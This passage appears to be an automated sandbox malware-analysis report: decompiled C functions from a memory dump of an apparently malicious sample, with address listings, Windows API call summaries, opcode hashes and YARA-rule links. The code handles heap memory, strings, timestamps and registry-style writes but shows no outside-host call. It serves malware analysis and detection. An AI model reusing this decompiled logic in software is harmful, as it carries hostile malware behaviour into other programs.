							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E0495A734(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E0495A71F((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x495d278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                          0x049562e1
                                                          0x049562e8
                                                          0x049562ed
                                                          0x049562f0
                                                          0x049562f7
                                                          0x049562fa
                                                          0x049562fd
                                                          0x04956302
                                                          0x04956307
                                                          0x0495645b
                                                          0x0495645d
                                                          0x0495645f
                                                          0x04956464
                                                          0x04956464
                                                          0x0495630d
                                                          0x04956310
                                                          0x04956313
                                                          0x04956315
                                                          0x04956315
                                                          0x04956319
                                                          0x00000000
                                                          0x00000000
                                                          0x0495631d
                                                          0x04956349
                                                          0x0495634e
                                                          0x04956350
                                                          0x04956350
                                                          0x04956353
                                                          0x04956356
                                                          0x04956356
                                                          0x04956358
                                                          0x00000000
                                                          0x04956323
                                                          0x04956325
                                                          0x04956344
                                                          0x04956344
                                                          0x0495635b
                                                          0x0495635b
                                                          0x0495635c
                                                          0x0495635c
                                                          0x0495635f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0495635f
                                                          0x04956329
                                                          0x04956370
                                                          0x04956374
                                                          0x0495644e
                                                          0x04956450
                                                          0x04956450
                                                          0x04956451
                                                          0x04956454
                                                          0x00000000
                                                          0x04956454
                                                          0x0495637d
                                                          0x0495638e
                                                          0x04956392
                                                          0x0495644a
                                                          0x00000000
                                                          0x0495644a
                                                          0x04956398
                                                          0x0495639b
                                                          0x0495639f
                                                          0x049563a3
                                                          0x049563a8
                                                          0x04956440
                                                          0x04956440
                                                          0x00000000
                                                          0x04956446
                                                          0x049563b3
                                                          0x049563bc
                                                          0x049563d0
                                                          0x049563d7
                                                          0x049563ec
                                                          0x049563f2
                                                          0x049563fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x049563fc
                                                          0x049563fc
                                                          0x049563fc
                                                          0x04956403
                                                          0x0495640b
                                                          0x00000000
                                                          0x00000000
                                                          0x0495640d
                                                          0x04956416
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04956418
                                                          0x0495641a
                                                          0x0495641d
                                                          0x0495641d
                                                          0x04956420
                                                          0x04956424
                                                          0x04956427
                                                          0x0495642d
                                                          0x04956430
                                                          0x04956437
                                                          0x00000000
                                                          0x049563b3
                                                          0x0495632e
                                                          0x04956336
                                                          0x0495633c
                                                          0x0495633e
                                                          0x0495633e
                                                          0x04956341
                                                          0x04956343
                                                          0x00000000
                                                          0x04956343
                                                          0x0495631d
                                                          0x04956363
                                                          0x04956368
                                                          0x0495636a
                                                          0x0495636a
                                                          0x0495636d
                                                          0x0495636d
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • lstrcpy.KERNEL32(63699BC4,00000020), ref: 049563D7
                                                          • lstrcat.KERNEL32(63699BC4,00000020), ref: 049563EC
                                                          • lstrcmp.KERNEL32(00000000,63699BC4), ref: 04956403
                                                          • lstrlen.KERNEL32(63699BC4), ref: 04956427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 71331ca7f5d227030116a7961a2f4e2624999eb12075c319dbce4f500d5cb785
                                                          • Instruction ID: 097142f375a79c264387b63e232de2e0d30db580c05912ffbd32fc7b2aa4f3eb
                                                          • Opcode Fuzzy Hash: 71331ca7f5d227030116a7961a2f4e2624999eb12075c319dbce4f500d5cb785
                                                          • Instruction Fuzzy Hash: 8A51B271A04218EBDF21CF99C4846ADBBBAFF55315F648076EC199B221C770BE42CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04953AB0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 04953B0D
                                                          • SysAllocString.OLEAUT32(049585ED), ref: 04953B51
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04953B65
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04953B73
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: f57e02b19ad4aa12e3e89a25a9d51c535e83d16503677bc12cde6ad0a413319a
                                                          • Instruction ID: d2beb27d87089fb61c99d6bd464fa0be819885364d3cb3b9ecec852f38ebf6bc
                                                          • Opcode Fuzzy Hash: f57e02b19ad4aa12e3e89a25a9d51c535e83d16503677bc12cde6ad0a413319a
                                                          • Instruction Fuzzy Hash: 62310E71900209EFDB14DF98D8C08AE7BB9FF48350B20852EFD0697260D775AA41CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04956545, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E04956545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E0495A71F(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                          0x04956551
                                                          0x04956555
                                                          0x04956556
                                                          0x04956557
                                                          0x04956559
                                                          0x0495655b
                                                          0x0495655e
                                                          0x04956563
                                                          0x049565fa
                                                          0x04956601
                                                          0x04956601
                                                          0x0495656c
                                                          0x04956573
                                                          0x04956583
                                                          0x04956583
                                                          0x04956589
                                                          0x0495658b
                                                          0x04956590
                                                          0x04956599
                                                          0x0495659f
                                                          0x049565a4
                                                          0x049565af
                                                          0x049565b3
                                                          0x049565b5
                                                          0x049565b6
                                                          0x049565bf
                                                          0x049565c3
                                                          0x049565d4
                                                          0x049565c5
                                                          0x049565ca
                                                          0x049565cf
                                                          0x049565de
                                                          0x049565de
                                                          0x049565b3
                                                          0x049565e4
                                                          0x049565ea
                                                          0x049565ea
                                                          0x049565f3
                                                          0x049565f8
                                                          0x049565f8
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: 2e96149674f9158c8b248cababaafa8f6572607d03af2961f05878be1f3df9dc
                                                          • Instruction ID: 084b39c62adea02dad9023aaeda6b495a9a90d1b80426a0378b18aaae6af2724
                                                          • Opcode Fuzzy Hash: 2e96149674f9158c8b248cababaafa8f6572607d03af2961f05878be1f3df9dc
                                                          • Instruction Fuzzy Hash: 25214175900209EFDB11DFA8C98499EBBB9FF98314B2041B9ED46D7214EB30EE41DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04958D14, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04958D14(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E0495A2F9(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x495d2a8; // 0x47a5a8
				_t4 = _t24 + 0x495edc0; // 0x4dd9368
				_t5 = _t24 + 0x495ed68; // 0x4f0053
				_t45 = E04955356( &_v16, _v8, _t5, _t4);
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x495d2a8; // 0x47a5a8
						_t11 = _t32 + 0x495edb4; // 0x4dd935c
						_t48 = _t11;
						_t12 = _t32 + 0x495ed68; // 0x4f0053
						_t52 = E049545C6(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x495d2a8; // 0x47a5a8
							_t13 = _t35 + 0x495edfe; // 0x30314549
							_t37 = E04958E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x495d25c - 6;
								if( *0x495d25c <= 6) {
									_t42 =  *0x495d2a8; // 0x47a5a8
									_t15 = _t42 + 0x495ec0a; // 0x52384549
									E04958E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x495d2a8; // 0x47a5a8
							_t17 = _t38 + 0x495edf8; // 0x4dd93a0
							_t18 = _t38 + 0x495edd0; // 0x680043
							_t45 = E04955D7D(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x495d238, 0, _t52);
						}
					}
					HeapFree( *0x495d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04954F14(_t54);
				}
				return _t45;
			}


















                                                          0x04958d14
                                                          0x04958d24
                                                          0x04958d27
                                                          0x04958d2e
                                                          0x04958d30
                                                          0x04958d30
                                                          0x04958d33
                                                          0x04958d38
                                                          0x04958d3f
                                                          0x04958d51
                                                          0x04958d55
                                                          0x04958d63
                                                          0x04958d71
                                                          0x04958d75
                                                          0x04958e06
                                                          0x04958e06
                                                          0x04958d7b
                                                          0x04958d7b
                                                          0x04958d80
                                                          0x04958d80
                                                          0x04958d87
                                                          0x04958d93
                                                          0x04958d95
                                                          0x04958d97
                                                          0x04958d99
                                                          0x04958da0
                                                          0x04958dab
                                                          0x04958db2
                                                          0x04958db4
                                                          0x04958dbb
                                                          0x04958dbd
                                                          0x04958dc4
                                                          0x04958dcf
                                                          0x04958dcf
                                                          0x04958dbb
                                                          0x04958dd4
                                                          0x04958dd9
                                                          0x04958de0
                                                          0x04958dfe
                                                          0x04958e00
                                                          0x04958e00
                                                          0x04958d97
                                                          0x04958e12
                                                          0x04958e12
                                                          0x04958e14
                                                          0x04958e19
                                                          0x04958e1b
                                                          0x04958e1b
                                                          0x04958e26

                                                          APIs
                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04DD9368,00000000,?,74B5F710,00000000,74B5F730), ref: 04958D63
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04DD93A0,?,00000000,30314549,00000014,004F0053,04DD935C), ref: 04958E00
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0495523E), ref: 04958E12
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 991de7d490d24c77d5f9b7dd17589561cdbec0561b15fcb1a2ed7642f68d4ba6
                                                          • Instruction ID: 6e9f4f301def724f2a20635cb322d0a01a0f8ae096f2f0c514ad328980004ff6
                                                          • Opcode Fuzzy Hash: 991de7d490d24c77d5f9b7dd17589561cdbec0561b15fcb1a2ed7642f68d4ba6
                                                          • Instruction Fuzzy Hash: 61317C32900208BFEF11FB94EC88EAA7BBDEB44714F344275E9059B170E671AE58DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0495A376, Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E0495A376(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x495d340; // 0x4dd9a88
				_push(0x800);
				_push(0);
				_push( *0x495d238);
				if( *0x495d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x495d24c =  *0x495d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E04957306(_t44, _t40);
						_t18 = E04954A09(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x495d24c < 5) {
								 *0x495d24c =  *0x495d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E04956761();
						RtlFreeHeap( *0x495d238, 0, _t40); // executed
						goto L10;
					}
					_t24 = E04951F13(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E04954AB6(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}











                                                          0x0495a376
                                                          0x0495a376
                                                          0x0495a379
                                                          0x0495a37a
                                                          0x0495a384
                                                          0x0495a38b
                                                          0x0495a390
                                                          0x0495a392
                                                          0x0495a398
                                                          0x0495a3c0
                                                          0x0495a3d8
                                                          0x0495a3da
                                                          0x0495a3db
                                                          0x0495a3dd
                                                          0x0495a41b
                                                          0x0495a41b
                                                          0x0495a421
                                                          0x0495a427
                                                          0x0495a427
                                                          0x0495a3df
                                                          0x0495a3e5
                                                          0x0495a3e8
                                                          0x0495a3f7
                                                          0x0495a3f9
                                                          0x0495a400
                                                          0x0495a434
                                                          0x0495a439
                                                          0x0495a43b
                                                          0x0495a43d
                                                          0x0495a43d
                                                          0x00000000
                                                          0x0495a43b
                                                          0x0495a402
                                                          0x0495a407
                                                          0x0495a415
                                                          0x00000000
                                                          0x0495a415
                                                          0x0495a3cf
                                                          0x0495a3d4
                                                          0x0495a3d4
                                                          0x00000000
                                                          0x0495a3d4
                                                          0x0495a3a2
                                                          0x00000000
                                                          0x00000000
                                                          0x0495a3b1
                                                          0x00000000

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 0495A39A
                                                            • Part of subcall function 04954AB6: GetTickCount.KERNEL32 ref: 04954ACA
                                                            • Part of subcall function 04954AB6: wsprintfA.USER32 ref: 04954B1A
                                                            • Part of subcall function 04954AB6: wsprintfA.USER32 ref: 04954B37
                                                            • Part of subcall function 04954AB6: wsprintfA.USER32 ref: 04954B63
                                                            • Part of subcall function 04954AB6: HeapFree.KERNEL32(00000000,?), ref: 04954B75
                                                            • Part of subcall function 04954AB6: wsprintfA.USER32 ref: 04954B96
                                                            • Part of subcall function 04954AB6: HeapFree.KERNEL32(00000000,?), ref: 04954BA6
                                                            • Part of subcall function 04954AB6: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04954BD4
                                                            • Part of subcall function 04954AB6: GetTickCount.KERNEL32 ref: 04954BE5
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 0495A3B8
                                                          • RtlFreeHeap.NTDLL(00000000,00000002,04955289,?,04955289,00000002,?,?,04955D5E,?), ref: 0495A415
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                          • String ID:
                                                          • API String ID: 1676223858-0
                                                          • Opcode ID: 97c22eaa29d2df565ad6d7545672ae9894eb9979dc85a862838c37b03dee8b2c
                                                          • Instruction ID: d7622a24a12a69356a99e41b4da6c6ff814f4c231497bb8688dd36a4a446207f
                                                          • Opcode Fuzzy Hash: 97c22eaa29d2df565ad6d7545672ae9894eb9979dc85a862838c37b03dee8b2c
                                                          • Instruction Fuzzy Hash: 2B213D71204305EBDB11DF98E884E9A3BACEB84354F204235FD05DB160EB74ED419BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0495219B, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 75%
                                                          			E0495219B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04953AB0(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x495d2a8; // 0x47a5a8
						_t20 = _t68 + 0x495e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E049557B4(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                          0x049521a1
                                                          0x049521a4
                                                          0x049521b4
                                                          0x049521bd
                                                          0x049521c1
                                                          0x0495228f
                                                          0x04952295
                                                          0x04952295
                                                          0x049521db
                                                          0x049521e0
                                                          0x049521e4
                                                          0x049521ea
                                                          0x049521ef
                                                          0x049521f6
                                                          0x04952205
                                                          0x04952205
                                                          0x04952209
                                                          0x0495220b
                                                          0x04952217
                                                          0x04952222
                                                          0x0495222d
                                                          0x04952231
                                                          0x0495223b
                                                          0x0495223f
                                                          0x04952241
                                                          0x04952246
                                                          0x0495224d
                                                          0x0495225d
                                                          0x0495225d
                                                          0x04952246
                                                          0x0495223f
                                                          0x0495225f
                                                          0x04952264
                                                          0x04952269
                                                          0x04952269
                                                          0x0495226c
                                                          0x04952275
                                                          0x0495227a
                                                          0x0495227a
                                                          0x0495227f
                                                          0x04952284
                                                          0x04952284
                                                          0x0495227f
                                                          0x04952209
                                                          0x04952286
                                                          0x0495228c
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 04953AB0: SysAllocString.OLEAUT32(80000002), ref: 04953B0D
                                                            • Part of subcall function 04953AB0: SysFreeString.OLEAUT32(00000000), ref: 04953B73
                                                          • SysFreeString.OLEAUT32(?), ref: 0495227A
                                                          • SysFreeString.OLEAUT32(049585ED), ref: 04952284
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: e6293705fb9be229d0ae4037beadd2d36d2cdf60d3a5f4ca5cd47e9a9ef3b7ec
                                                          • Instruction ID: e958ef1755e81781ec1f3bc07a477ba8185e37bedd14f3d5c42ec8958aff0ebd
                                                          • Opcode Fuzzy Hash: e6293705fb9be229d0ae4037beadd2d36d2cdf60d3a5f4ca5cd47e9a9ef3b7ec
                                                          • Instruction Fuzzy Hash: F5315E76500219AFCB15DF94D888C9BBB7AFBC97407248AA8FC159B220D631ED51CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04958E27, Relevance: 3.0, APIs: 2, Instructions: 50memorytimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04958E27(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E04959070(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E049572C0(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E049522F1(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x495d238, 0, _t25);
				}
				return _t22;
			}











                                                          0x04958e27
                                                          0x04958e38
                                                          0x04958e3c
                                                          0x04958e97
                                                          0x04958e3e
                                                          0x04958e45
                                                          0x04958e4d
                                                          0x04958e50
                                                          0x04958e55
                                                          0x04958e59
                                                          0x04958e5f
                                                          0x04958e67
                                                          0x04958e6a
                                                          0x04958e82
                                                          0x04958e82
                                                          0x04958e8d
                                                          0x04958e8d
                                                          0x04958e9e

                                                          APIs
                                                            • Part of subcall function 04959070: lstrlen.KERNEL32(?,00000000,04DD9A98,00000000,04958808,04DD9C76,?,?,?,?,?,63699BC3,00000005,0495D00C), ref: 04959077
                                                            • Part of subcall function 04959070: mbstowcs.NTDLL ref: 049590A0
                                                            • Part of subcall function 04959070: memset.NTDLL ref: 049590B2
                                                          • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74B05520,00000008,00000014,004F0053,04DD935C), ref: 04958E5F
                                                          • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74B05520,00000008,00000014,004F0053,04DD935C), ref: 04958E8D
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                          • String ID:
                                                          • API String ID: 1500278894-0
                                                          • Opcode ID: a08929bb598a79731458387abda47529e5c1de2e0bb3821e9b99d7ab14aae079
                                                          • Instruction ID: 909e4adc8cd75802d0f5887dd94f81d2833c1f1108b5295ad4726ef7e4e73acf
                                                          • Opcode Fuzzy Hash: a08929bb598a79731458387abda47529e5c1de2e0bb3821e9b99d7ab14aae079
                                                          • Instruction Fuzzy Hash: 32017132200209BAEB21AFA4DC44E9F7F7DEF84754F204435FE009A160DA71E964DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 049558DB, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E049558DB(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
